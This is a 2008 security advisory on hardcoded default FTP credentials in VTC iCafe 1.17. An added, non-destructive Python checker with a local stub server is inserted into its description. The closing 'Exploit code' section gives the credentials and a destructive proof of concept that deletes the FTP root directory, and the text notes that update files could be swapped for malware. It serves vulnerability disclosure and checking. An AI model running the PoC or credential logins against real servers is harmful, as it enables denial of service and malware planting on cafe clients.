BLUE MOON SECURITY ADVISORY 2008-08

Title: Insecure default FTP password in VTC iCafe
Severity: Critical
Reporter: Blue Moon Consulting
Products: VTC iCafe 1.17
Fixed in: --

Description

VTC iCafe is an internet cafe management application. It ships with hardcoded default FTP credentials (username VTCIntecom, password VTCIntecom). The FTP server listens on TCP port 6655 and distributes update files to the client machines. Anyone who can reach that port can log in with these credentials and a) cause a denial of service on the clients by removing the FTP root directory, or b) place malware such as viruses or trojans on the clients by replacing the update files.
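The non-destructive counterpart to the proof of concept further down: a check that reports whether a host accepts the advisory's default credentials, logging in and doing nothing else. This is an added example, not Blue Moon Consulting's or VTC's code. The stub FTP server inside it is constructed purely so the check can be exercised offline; the names check_default_creds and StubFTPServer are this example's own, and the real target is the iCafe update server on port 6655.

```python
"""Non-destructive check for the VTC iCafe default FTP credentials.

Added example; not Blue Moon Consulting's or VTC's code. It logs in with
the credentials from the advisory and does nothing else on the server.
The StubFTPServer below is a constructed stand-in that speaks just enough
FTP (USER/PASS/QUIT) to exercise the check offline.
"""
import ftplib
import socketserver
import sys
import threading

DEFAULT_USER = "VTCIntecom"      # credentials named in the advisory
DEFAULT_PASS = "VTCIntecom"
ICAFE_FTP_PORT = 6655            # port the iCafe update FTP server listens on


def check_default_creds(host, port=ICAFE_FTP_PORT, timeout=5.0):
    """True if the default credentials are accepted, False if the server
    rejects them, None if the service cannot be reached or talked to."""
    ftp = ftplib.FTP()
    try:
        ftp.connect(host, port, timeout=timeout)
    except ftplib.all_errors:
        return None
    try:
        ftp.login(DEFAULT_USER, DEFAULT_PASS)   # USER + PASS only, nothing else
        return True
    except ftplib.error_perm:                   # 5xx reply: credentials refused
        return False
    except ftplib.all_errors:                   # timeout, reset, malformed reply
        return None
    finally:
        try:
            ftp.quit()
        except ftplib.all_errors:
            ftp.close()


class _StubHandler(socketserver.StreamRequestHandler):
    """Constructed minimal FTP dialogue, used only to test the check."""

    def handle(self):
        self._reply("220 stub ready")
        user = None
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd, _, arg = line.decode("latin-1").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user = arg
                self._reply("331 password required")
            elif cmd == "PASS":
                if (user, arg) in self.server.accepted:
                    self._reply("230 logged in")
                else:
                    self._reply("530 login incorrect")
            elif cmd == "QUIT":
                self._reply("221 bye")
                return
            else:
                self._reply("502 not implemented")

    def _reply(self, text):
        self.wfile.write((text + "\r\n").encode("latin-1"))


class StubFTPServer(socketserver.ThreadingTCPServer):
    """Listens on an ephemeral 127.0.0.1 port and accepts only the given
    (user, password) pairs. Constructed for testing; not the iCafe server."""
    allow_reuse_address = True
    daemon_threads = True

    def __init__(self, accepted):
        super().__init__(("127.0.0.1", 0), _StubHandler)
        self.accepted = set(accepted)
        self.port = self.server_address[1]
        threading.Thread(target=self.serve_forever, daemon=True).start()

    def stop(self):
        self.shutdown()
        self.server_close()


if __name__ == "__main__":
    # Usage: python check_icafe.py <host> [port]
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else ICAFE_FTP_PORT
    verdict = check_default_creds(target, port)
    print({True: "VULNERABLE: default credentials accepted",
           False: "default credentials rejected",
           None: "service unreachable"}[verdict])
```

The three-way result matters in practice: a closed or filtered port 6655 is not the same as a server that rejects the credentials, and only a 5xx reply to PASS justifies marking a host as fixed.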

Workaround

There is no workaround.

Fix

There is no fix at the moment. Customers are advised to contact the vendor for a proper fix.

Disclosure

Blue Moon Consulting follows RFPolicy v2.0 when notifying vendors.

Initial vendor contact:
 August 12, 2008: Initial contact sent to support.icafe@vtc.vn
Vendor response:
 --
Public disclosure:
 August 20, 2008
Exploit code:

import ftplib

# Proof of concept for case a) above: remove the FTP root directory using
# the default credentials. "localhost" stands for the address of the iCafe
# server; 6655 is the port its update FTP server listens on.
ftp = ftplib.FTP()
ftp.connect("localhost", 6655)
ftp.login("VTCIntecom", "VTCIntecom")
# RMD with a NUL-byte argument removes the FTP root directory. This is
# destructive: the clients lose their update source.
ftp.sendcmd("RMD \x00")
ftp.quit()

Disclaimer

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.